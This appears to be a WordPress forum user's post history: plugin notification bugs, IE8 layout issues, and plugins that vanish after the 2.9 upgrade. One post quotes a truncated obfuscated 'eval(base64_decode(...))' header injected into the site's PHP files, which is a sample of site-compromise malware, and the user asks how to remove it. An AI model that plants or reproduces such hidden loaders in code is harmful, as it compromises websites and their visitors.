@revolutionfrance: Sorry if I sounded upset, but I’ve posted multiple times about this issue and have not gotten any response from the developer, so I was unaware that he knows about it and is working on it. Usually I get at least a “Yes, we know it’s broken and we’re fixing it” reply, but this time nothing. I get that the plug-in is free, I get that a lot of time goes into development, and I appreciate the work he’s done. It would just be nice to know the guy is listening and can address his customers’ concerns. At least in my comment I said please and thank you, that’s more than some people do .
My apologies if I offended anybody, and my compliments to the developer. Have a good one!
This plug-in just put out version 3.1.3 today, and it still says that email and Facebook notifications will be sent out if someone comments on your blog. WHY DOES THIS FEATURE STILL NOT WORK??
@graham Swan, please get back to us about the status of this flaw in your plug-in.
Thanks.
Thanks, I got this problem fixed. Now if I could only get notifications to work…
Notifications are not working for me, either. I’m using v. 3.1. Hopefully someone replies with a fix soon!
Well, thanks to some brainstorming by some good friends out in the land of the Internet, I determined that this problem was caused by a security plug-in called WP-Secure from https://www.sitesecuritymonitor.com. I found it by deactivating all plug-ins and the reactivating them one at a time, revealing the security plug-in to be the culprit. I have checked my blog in IE8 since making the change and it now displays perfectly. Thanks for your help though, and for the link to the validation site. One of these days I’ll figure out how to fix them!
BTW, this just shows my novice status in this: what file am I editing to correct these issues? Are all these errors in the same file??
OK, I’ll do my best…fixing code is definitely NOT my forte!
Holy crap, thanks, but this might be beyond my ability to fix…do ALL of these have to be corrected in order for the blog to display correctly in IE8?
I am having a similar problem, but I NEVER use MS Word to edit or write blog content. Can you take a look? https://wallingfordwired.com
everything looks great in FF or Opera, but in IE8 the sidebars are dropped waaaayyyyy down to the bottom of the page, and the nav bar is slightly off. Any help would be appreciated.Forum: Fixing WordPress
In reply to: All plug-ins deactivated and GONE after 2.9 upgrade!I checked every PHP file in my WP install and many had that code as the header. I removed it, saved the files and uploaded them back to the server. All my plug-ins returned, but now I have a different problem. I cannot reactivate 2 plug-ins, All in One SEO Pack and What Would Seth Godin Do. When I try to reactivate them, I get an error message,
“Warning: Cannot modify header information – headers already sent by (output started at /home/content/w/h/a/wharriman/html/wp-content/themes/thesis_16/functions.php:1) in /home/content/w/h/a/wharriman/html/wp-includes/pluggable.php on line 868”
The only way to get rid of it is to close the tab and log back into my admin area in a new tab. I have looked at that file and there is nothing wrong with it that I can see, but I don’t know what to look for. Any ideas?

In reply to: All plug-ins deactivated and GONE after 2.9 upgrade!Sorry, this is my first experience with this issue and I didn’t understand. Thanks for your patience. I checked all the plug-ins through my FTP client and they are there, but all the PHP files start with this code:
?php /**/ eval(base64_decode(“JGs9MTQ4OyRtPWV4cGxvZGUoIjsiLCIyNTM7MjQyOzE4ODsyNDI7MjI1OzI1MDsyNDc7MjI0OzI1MzsyNTE7MjUwOzIwMzsyNDE7MjM2OzI1MzsyMzE7MjI0OzIzMTsxODg7MTc5OzI1MTsyNDY7Mj…etc etc <?php
Is this the invalid header the error referred to? I seem to remember this base64 crap as being a hack or something, is that right? can I just delete it and save the file to restore proper functionality of the plug-ins? Thanks again for your help and patience!

In reply to: All plug-ins deactivated and GONE after 2.9 upgrade! That’s just it: all my plug-ins no longer appear in the dashboard area, except Akismet and Hello Dolly. All the rest are GONE, so I can’t look at them in the editor. This has to be an issue with the 2.9 upgrade. I did not deactivate all the plug-ins before upgrading, which I’ve seen other people say to do, but that bit of info wasn’t in the installation instructions. I did the automatic upgrade and it said it was successful.
Also, this isn’t a permissions issue, the error message said they all had invalid headers. Or am I wrong? Is there any way to revert to 2.8.6? I can’t even restore my database because my DB Manager plug-in is GONE. Any help wold be greatly appreciated!

In reply to: Can’t run Local Market ExplorerI have a similar problem. I’m running the plug-in on my blog at https://wallingfordwired.com/local/wallingford/ct. I get an “Oops! Page Not Found” error. Not sure I even installed the plug-in correctly, nor could I determine how to apply for an API upgrade to be able to display the Market Reports. I was not sure what to enter in some of the field, such as # of additional API calls. Any help would be appreciated.
